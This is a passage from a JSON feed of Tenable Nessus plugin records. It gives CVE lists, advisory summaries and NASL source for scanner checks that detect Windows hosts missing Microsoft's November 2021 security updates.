"CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007245.NASL", "href": "https://www.tenable.com/plugins/nessus/154995", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154995);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007245\");\n script_xref(name:\"MSKB\", value:\"5007260\");\n script_xref(name:\"MSFT\", value:\"MS21-5007245\");\n script_xref(name:\"MSFT\", value:\"MS21-5007260\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007245: Windows Server 2012 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007245\nor cumulative update 5007245. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370,\n CVE-2021-41377, CVE-2021-41379, CVE-2021-42278,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007245\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007260\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007245 or Cumulative Update 5007260.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = \"MS21-11\";\nvar kbs = make_list('5007245', '5007260');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nvar productname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007245, 5007260])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T15:39:09", "description": "The remote Windows host is missing security update 5007255 or cumulative update 5007247. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42278, CVE-2021-42282, CVE-2021-42283, CVE-2021-42285, CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-38666, CVE-2021-42275)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007255: Windows Server 2012 R2 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42278", "CVE-2021-42282", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285", "CVE-2021-42287", "CVE-2021-42291"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007255.NASL", "href": "https://www.tenable.com/plugins/nessus/154996", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154996);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42278\",\n \"CVE-2021-42282\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\",\n \"CVE-2021-42287\",\n \"CVE-2021-42291\"\n );\n script_xref(name:\"MSKB\", value:\"5007255\");\n script_xref(name:\"MSKB\", value:\"5007247\");\n script_xref(name:\"MSFT\", value:\"MS21-5007255\");\n script_xref(name:\"MSFT\", value:\"MS21-5007247\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/02\");\n\n script_name(english:\"KB5007255: Windows Server 2012 R2 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5007255\nor cumulative update 5007247. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-42284)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-41366, CVE-2021-41367, CVE-2021-41370,\n CVE-2021-41377, CVE-2021-41379, CVE-2021-42278,\n CVE-2021-42282, CVE-2021-42283, CVE-2021-42285,\n CVE-2021-42287, CVE-2021-42291)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-38666,\n CVE-2021-42275)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007255\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007247\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5007255 or Cumulative Update 5007247.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42291\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007255', '5007247');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007255, 5007247])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T15:40:08", "description": "The Windows installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands.\n \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services.\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007207: Windows 10 LTS 1507 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41379", "CVE-2021-42275", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007207.NASL", "href": "https://www.tenable.com/plugins/nessus/154987", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154987);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41379\",\n \"CVE-2021-42275\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\"\n );\n script_xref(name:\"MSFT\", value:\"MS21-5007207\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n\n script_name(english:\"KB5007207: Windows 10 LTS 1507 Security Update (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute \n unauthorized arbitrary commands.\n \n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component\n to deny system or application services.\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive\n information.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update 5007207\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-42285\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-42275\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-11';\nkbs = make_list(\n '5007207'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'11_2021',\n bulletin:bulletin,\n rollup_kb_list:[5007207])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T15:39:09", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42276, CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007215: Windows 11 Security Updates (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007215.NASL", "href": "https://www.tenable.com/plugins/nessus/154997", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154997);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n \"CVE-2021-41356\",\n \"CVE-2021-41366\",\n \"CVE-2021-41367\",\n \"CVE-2021-41370\",\n \"CVE-2021-41371\",\n \"CVE-2021-41377\",\n \"CVE-2021-41378\",\n \"CVE-2021-41379\",\n \"CVE-2021-42274\",\n \"CVE-2021-42276\",\n \"CVE-2021-42277\",\n \"CVE-2021-42279\",\n \"CVE-2021-42280\",\n \"CVE-2021-42283\",\n \"CVE-2021-42284\",\n \"CVE-2021-42285\"\n );\n script_xref(name:\"MSKB\", value:\"5007215\");\n script_xref(name:\"MSFT\", value:\"MS21-5007215\");\n script_xref(name:\"IAVA\", value:\"2021-A-0539-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0544\");\n script_xref(name:\"IAVA\", value:\"2021-A-0545-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n\n script_name(english:\"KB5007215: Windows 11 Security Updates (November 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-41356,\n CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26443,\n CVE-2021-38666, CVE-2021-41378, CVE-2021-42276,\n CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367,\n CVE-2021-41370, CVE-2021-41377, CVE-2021-41379,\n CVE-2021-42277, CVE-2021-42280, CVE-2021-42283,\n CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-38631, CVE-2021-38665,\n CVE-2021-41371)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5007215\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5007215 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26443\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-11\";\nkbs = make_list('5007215');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n rollup_date:'11_2021',\n os_build:'22000',\n bulletin:bulletin,\n rollup_kb_list:[5007215])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-24T15:38:21", "description": "The remote Windows host is missing security update 5007189.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42275, CVE-2021-42276, CVE-2021-42279)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-42288)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42284)", "cvss3": {"score": 9, "vector": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007189: Windows 10 Version 1909 Security Update (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", 